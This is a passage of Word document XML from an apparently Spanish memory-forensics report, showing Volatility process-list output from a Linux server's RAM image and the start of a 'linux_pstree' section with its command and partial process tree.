        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629D9B5A"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0xffff900557adad80 master               26489           1               0               0      0x0000000036a42000 2018-12-30 10:46:13 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F8240" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535DA59C"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0xffff900557ad8000 qmgr                 26500           26489           112             117    0x0000000017baa000 2018-12-30 10:46:13 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074B848" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA72A50"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0xffff90057940ad80 kworker/0:0          19056           2               0               0      ------------------ 2019-01-03 04:24:46 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE4C45" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0F1456"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0xffff90057b010000 kworker/u30:2        19454           2               0               0      ------------------ 2019-01-03 05:50:42 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D50A9B1" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8BCF7A"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0xffff9005448adb00 apache2              19704           5469            33              33     0x000000003a7ec000 2019-01-03 06:25:21 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8ABA3D" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A369EA"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0xffff9005448ac440 apache2              19705           5469            33              33     0x000000003ce4a000 2019-01-03 06:25:21 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17178A88" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652313BE"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0xffff9005448aad80 apache2              19706           5469            33              33     0x000000003cf7e000 2019-01-03 06:25:21 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A4B1C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB942C8"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0xffff900557b6ad80 apache2              19707           5469            33              33     0x000000002c6d8000 2019-01-03 06:25:21 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A906ADB" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1743B592"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0xffff900579f34440 apache2              19708           5469            33              33     0x000000003ae1a000 2019-01-03 06:25:21 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71602CCC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B995D63"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0xffff900579715b00 kworker/0:1          19709           2               0               0      ------------------ 2019-01-03 06:25:21 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A374C4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A04D0B"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0xffff900579f32d80 apache2              19952           5469            33              33     0x000000002c644000 2019-01-03 06:33:15 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C330FC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B89409"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0xffff900579f316c0 apache2              19953           5469            33              33     0x0000000036cfc000 2019-01-03 06:33:16 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493B0CB6" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3113EC78"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0xffff900579f30000 apache2              20230           5469            33              33     0x000000000453c000 2019-01-03 07:26:31 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796381CC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64639135"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0xffff900557b6db00 apache2              20231           5469            33              33     0x000000003ad62000 2019-01-03 07:26:32 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79776D96" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC68162"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0xffff900557b6c440 apache2              20232           5469            33              33     0x0000000036ccc000 2019-01-03 07:26:33 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B404B5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5E725C"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lastRenderedPageBreak/>
        <w:t>0xffff900557b696c0 apache2              20233           5469            33              33     0x000000003b35e000 2019-01-03 07:26:34 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16257F47" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E55DA2A"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0xffff900557b68000 sh                   20381           19952           33              33     ------------------ 2019-01-03 07:32:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37909372" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9F2D36"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0xffff90054f620000 sshd                 20483           12159           0               0      0x0000000016244000 2019-01-03 07:50:04 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40754F49" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B96540D"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0xffff9005797116c0 systemd              20485           1               1000            1000   0x000000003b608000 2019-01-03 07:50:05 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F794F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71232B9F"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0xffff9005445c0000 (sd-pam)             20486           20485           1000            1000   0x0000000036902000 2019-01-03 07:50:05 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228DCB14" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4D55BD"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0xffff90057b6bdb00 sshd                 20576           20483           1000            1000   0x0000000019760000 2019-01-03 07:50:05 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B49003" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADF31EA"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0xffff90057b6bc440 bash                 20577           20576           1000            1000   0x000000001624c000 2019-01-03 07:50:05 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E05A373" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8ABA64"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0xffff900542fadb00 pickup               20703           26489           112             117    0x000000002c792000 2019-01-03 08:01:34 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C3CE3" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381D8D1C"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0xffff90057df516c0 kworker/u30:1        20781           2               0               0      ------------------ 2019-01-03 08:09:21 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298763B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BB2B89"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0xffff90057df54440 kworker/u30:0        20886           2               0               0      ------------------ 2019-01-03 08:16:28 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC7DE4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078201BC"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0xffff90057b4396c0 sudo                 20893           20577           0               0      0x000000003b602000 2019-01-03 08:17:06 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76601A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21895068"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0xffff90057b43c440 insmod               20894           20893           0               0      0x0000000002f26000 2019-01-03 08:17:06 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A51C234" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDE67B8" w14:textId="77777777"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0xffff90057b015b00 kworker/0:2          20898           2               0               0      ------------------ 2019-01-03 08:17:06 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15373EC4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A205EBD" w14:textId="7DC21272" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7D4C5" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="673BBA96" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="2704BE59" w14:textId="34F552E7" w:rsidR="00182D42" w:rsidRDefault="00182D42">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D346A" w14:textId="4CDD994F" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Ref155719938"/>
      <w:bookmarkStart w:id="196" w:name="_Toc155782540"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XVI. Comando linux_pstree.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w14:paraId="53E1CC45" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9"/>
    <w:p w14:paraId="186667BC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00C9562B" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA643A8" w14:textId="5F3C6CFC" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001225E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_pstree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E4BE4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00C9562B" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3224B9" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9"/>
    <w:p w14:paraId="4AB79E34" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:r w:rsidRPr="006A2A95">
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D184C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD9C233" w14:textId="77777777" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50125F75"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Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4F2AE" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3DD1B1"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Name                 Pid             Uid            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EDB9F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A23097"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systemd              1                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C3782" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2F0107"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.lvmetad             414                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A3A6A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4719DF"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.systemd-logind      712                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014FB33A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B85FEB"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.dbus-daemon         720             103            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B6CD1" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D44A764"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.cron                733                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA8956" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD68C2E"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.accounts-daemon     734                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B636D67" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
